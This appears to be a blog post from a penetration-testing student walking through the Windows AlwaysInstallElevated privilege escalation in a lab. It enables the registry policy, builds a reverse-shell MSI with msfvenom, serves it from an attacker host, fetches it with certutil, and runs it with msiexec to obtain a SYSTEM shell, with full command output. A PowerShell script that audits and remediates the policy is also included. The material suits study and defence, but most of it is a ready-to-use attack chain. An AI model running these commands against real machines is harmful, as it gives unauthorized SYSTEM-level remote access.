The AlwaysInstallElevated policy lets an administrator allow Windows Installer packages to be installed with system-level privileges.
Microsoft does not recommend enabling it today. However, it is something I'm learning more about as I pursue my GPEN.
To be able to leverage this facility, the AlwaysInstallElevated value must be set under two registry keys. These are:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
Checking to see if it is set under HKLM.

C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer /s /f AlwaysInstallElevated

End of search: 0 match(es) found.
Nothing found under HKLM, so checking HKCU.

C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer /s /f AlwaysInstallElevated

End of search: 0 match(es) found.
Nothing found. Now I'm going to add the values, so that I can test the vulnerability.
C:\>reg ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

C:\>reg ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.
Verifying the entries have been created.
C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
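As an added example (my own script, not part of the original post), the two reg query checks above as one PowerShell audit that reports whether the policy is actually effective on the host, with the remediation left commented out; the variable names are mine.

```powershell
# Added example: audit AlwaysInstallElevated in both hives in one pass.
# Windows Installer only honours the policy when BOTH hives carry a DWORD
# of 1; a value present in only one hive is inert.
$subKey = 'Software\Policies\Microsoft\Windows\Installer'
$hives  = @{
    HKLM = "HKLM:\$subKey"
    HKCU = "HKCU:\$subKey"
}

$state = @{}
foreach ($hive in $hives.Keys) {
    $path = $hives[$hive]
    # A missing key or a missing value both mean "not set", which is the
    # same outcome as the "0 match(es) found" reg query result above.
    $value = (Get-ItemProperty -Path $path -Name AlwaysInstallElevated `
              -ErrorAction SilentlyContinue).AlwaysInstallElevated
    if ($null -eq $value) { $state[$hive] = 'not set' } else { $state[$hive] = $value }
    Write-Host ("{0}: AlwaysInstallElevated = {1}" -f $hive, $state[$hive])
}

$effective = ($state.HKLM -eq 1) -and ($state.HKCU -eq 1)
if ($effective) {
    Write-Warning 'AlwaysInstallElevated is ENABLED in both hives: any MSI this user installs runs as SYSTEM.'
} else {
    Write-Host 'AlwaysInstallElevated is not effective (needs a value of 1 in BOTH HKLM and HKCU).'
}

# Remediation (HKLM needs an elevated prompt): set both values to 0.
# On a domain-joined host, set it through Group Policy instead:
#   Computer/User Configuration > Administrative Templates >
#   Windows Components > Windows Installer >
#   "Always install with elevated privileges" = Disabled
# Uncomment to apply locally:
# foreach ($path in $hives.Values) {
#     if (Test-Path $path) {
#         Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
#     }
# }
```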
With the two entries in place, it's time to create a malicious MSI package via MSFVenom.

┌──(root💀securitynik)-[~/Downloads]
└─# msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=10.0.0.107 LPORT=9999 --format msi --out malicious.msi --smallest
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: malicious.msi
Set up a listener on port 9999.

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Set up a web server to host the malicious file.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Before downloading the file, and since this is about privilege escalation, it's time to verify the privileges this user has.

C:\tmp>whoami
sec560student\sec560

C:\tmp>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192
Downloading the file using certutil.

C:\tmp>certutil -URLCache -f http://10.0.0.107:80/malicious.msi malicious.msi
****  Online  ****
CertUtil: -URLCache command completed successfully.
Confirming the file was downloaded.
┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [28/Nov/2021 19:12:25] "GET /malicious.msi HTTP/1.1" 200 -
Running the msiexec command.
C:\tmp>msiexec /quiet /qn /i malicious.msi
At this point, looking at the last command, it looks like nothing happened. Looking back at my ncat session, we see:

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.0.0.110.
Ncat: Connection from 10.0.0.110:2283.
Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
C:\WINDOWS\system32>

The shell is running as SYSTEM, and the echoed commands below are the reverse shell repeating each command it received:

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes
====================================== ================ ============================================================== ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT SERVICE\msiserver                   Well-known group S-1-5-80-685333868-2237257676-1431965530-1907094206-2438021966 Enabled by default, Enabled group, Group owner
LOCAL                                  Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner
That's it for this post!